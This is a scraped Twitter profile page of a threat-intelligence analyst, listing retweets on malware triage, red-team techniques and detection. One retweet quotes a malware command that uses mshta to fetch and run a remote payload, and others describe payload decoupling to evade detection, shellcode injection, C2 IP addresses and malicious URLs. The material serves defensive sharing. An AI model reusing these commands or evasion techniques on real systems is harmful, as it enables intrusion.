Devon Kerr

@_devonkerr_

Intelligence & Analytics Team Lead Security | custodian of secret histories | seeking payment in change

Northern Virginia
linkedin.com/in/devonkerr
Vrijeme pridruživanja: listopad 2014.
74 fotografije ili videozapisa Fotografije i videozapisi

Tweetovi

Blokirali ste korisnika/cu @_devonkerr_

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @_devonkerr_

  1. proslijedio/la je Tweet
    4. velj

    Inspired by awesome people, last year I made a cheatsheet for measuring CTI aspects. This year I've moved it to github, tweaked the sheet a bit and updated ito make it easier to maintain for both myself & you folks. Expect more content on CTI & RT. Cheers!

    Got inspired by the awesome & and their recent talks on CTI metrics. To mature our trade, we might even have to take metrics one step further. Have a look at attached; plotted metrics against audience, value and level of 'maturity'. Tell me what you think!
    Prikaži ovu nit
    33 proslijeđena tweeta 76 korisnika označava da im se sviđa
    Poništi
  2. proslijedio/la je Tweet
    31. sij

    A genealogy of 10 malware EXEs that share code - and one that doesn't belong - visualized. The rows are individual samples, and the color-blocks are their functions. A somewhat complicated algorithm is used to draw a plausible evolutionary lineage. Work from my CyberGenome days.

    2 proslijeđena tweeta 11 korisnika označava da im se sviđa
    Poništi
  3. proslijedio/la je Tweet
    1. velj

    Load encrypted PE from XML Attribute. MSBuild is still the best.😅 MSBuild sets Property then calls Execute. Use this example to decouple payloads & prove that all security products have a "Single File Bias". Decouple payloads to subvert detection.

    5 replies 149 proslijeđenih tweetova 309 korisnika označava da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  4. proslijedio/la je Tweet
    30. sij

    Quick visual on triaging a multi-stage payload starting with a persistent scheduled task launching: mshta http:\\pastebin[.]com\raw\JF0Zjp3g ⚠️ note: simple backslash URL trick 💆 know: "4D 5A" (MZ) 🔚 Result: on https://paste[.]ee/r/OaKTX C2: cugugugu.duckdns[.]org

    57 proslijeđenih tweetova 155 korisnika označava da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  5. proslijedio/la je Tweet
    30. sij

    New Twist on an older technique MD5: 4b82f1de393a07aa9ba91d046e2fd6b0 Execute Assembly via System.Runtime.InteropServices.RegistrationServices.UnregisterAssembly. Basically just Another Way to Call Instead of CreateInstance. There is more here but that was fun.

    26 proslijeđenih tweetova 89 korisnika označava da im se sviđa
    Poništi
  6. proslijedio/la je Tweet
    28. sij

    [Educational] One of the best blog posts that I ever read about going from 0 to unauth RCE in f**king Mikrotik OS step by step:

    395 proslijeđenih tweetova 934 korisnika označavaju da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  7. proslijedio/la je Tweet
    26. sij

    A Red Teamer’s Guide to GPOs and OUs

    13 proslijeđenih tweetova 27 korisnika označava da im se sviđa
    Poništi
  8. proslijedio/la je Tweet
    24. sij

    IOCs, the decompiled C# code with deobfuscated strings, a registry data config decrypter (for those who are infected) and some information of the Project TajMahal malware sample uploaded in 2019 to Virustotal:

    1 reply 52 proslijeđena tweeta 102 korisnika označavaju da im se sviđa
    Poništi
  9. proslijedio/la je Tweet
    23. sij

    interesting sample, using minimal macro to write to startup folder for persistence & uses IE via COM to download 2 txt files (no noisy ps or abnormal exec).

    39 proslijeđenih tweetova 126 korisnika označava da im se sviđa
    Poništi
  10. proslijedio/la je Tweet
    23. sij

    In this new , Insikt Group assesses that repeated communications from a targeted European energy sector mail server to a PupyRAT C2 are sufficient to indicate a likely intrusion:

    1 reply 18 proslijeđenih tweetova 21 korisnik označava da mu se sviđa
    Poništi
  11. proslijedio/la je Tweet
    20. sij

    New Epoch 2 urls //www.divyapushti.org/wp-admin/cmLoLV/ //www.lespianosduvexin.fr/revslider0/htr/ //csdnshop.com/wp-admin/0kuev1/ //chihuitest.bodait.com/cgi-bin/krh/ s://studiodentistico-candeo.it/wp-content/hF/

    7 proslijeđenih tweetova 10 korisnika označava da im se sviđa
    Poništi
  12. proslijedio/la je Tweet
    20. sij

    When I come across a new thing in that I'm trying to understand, is one of my go-to tools. 20: Check out 's list of great CyberChef 🤖👨‍🍳 recipes for insight (and inspiration!) on what that great tool can do: 🔗

    47 proslijeđenih tweetova 129 korisnika označava da im se sviđa
    Poništi
  13. proslijedio/la je Tweet
    20. sij
    Odgovor korisnicima

    This article explains it well.

    1 reply 1 proslijeđeni tweet 5 korisnika označava da im se sviđa
    Poništi
  14. proslijedio/la je Tweet
    20. sij

    I recently updated Get-PE in PowerShellArsenal to parse out the debug directory so that PDB strings can be extracted programmatically. I did it because needed to confirm the absence of debug strings as one of many post-build OPSEC checks. Dude is master operator. 😍

    6 replies 35 proslijeđenih tweetova 162 korisnika označavaju da im se sviđa
    Poništi
  15. proslijedio/la je Tweet
    18. sij

    Because some people asked, here’s APT28 infra from October till now. They setup around 2-3 C2s a month. 184.95.51.172 2020-01 😈 78.142.19.114 2019-12 💀 80.255.3.116 2019-12 💀 193.70.80.214 2019-11 💀 185.141.63.103 2019-11 💀 109.169.15.73 2019-10 💀 178.32.251.98 2019-10 💀

    Here’s the first (new) 2020 IP from our Russian friends in apartment 28: 184.95.51.172 Using an older known domain but the first server we saw being setup in 2020, around January 13th to be exact.
    6 replies 112 proslijeđenih tweetova 273 korisnika označavaju da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  16. proslijedio/la je Tweet
    18. sij
    Odgovor korisnicima

    How to help?

    1 reply 1 proslijeđeni tweet 6 korisnika označava da im se sviđa
    Poništi
  17. proslijedio/la je Tweet
    17. sij

    learned lessons here are: a) alert on file writes to startup folder by office processes (not noisy) b) monitor continuous network connections from cscript.exe

    7 proslijeđenih tweetova 32 korisnika označavaju da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  18. proslijedio/la je Tweet
    18. sij

    ": a Stealthy Lateral Movement Strategy" is now available to read Read if interested to see a new practical lateral movement Demo (TDS (MS SQL) & FTP): Prototype will be released soon

    1 reply 184 proslijeđena tweeta 356 korisnika označava da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  19. proslijedio/la je Tweet
    17. sij

    I spent some time learning about blockdlls and parent process spoofing from and . Using a recent sample from SubTee, I modified it to spoof the parent process and inject x64 shellcode from a dll on UNC into hidden iexplore.exe.

    6 replies 123 proslijeđena tweeta 307 korisnika označava da im se sviđa
    Poništi
  20. proslijedio/la je Tweet
    15. sij

    Fun fact for the day: IntegrityLevel within process creation events provides context to detection opportunities. Example: Open powershell as administrator, the integrity is "High". Processes running under that process will now be high as well. (1/5)

    22 proslijeđena tweeta 61 korisnik označava da mu se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi

@_devonkerr_ još nije objavio nijedan Tweet.

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·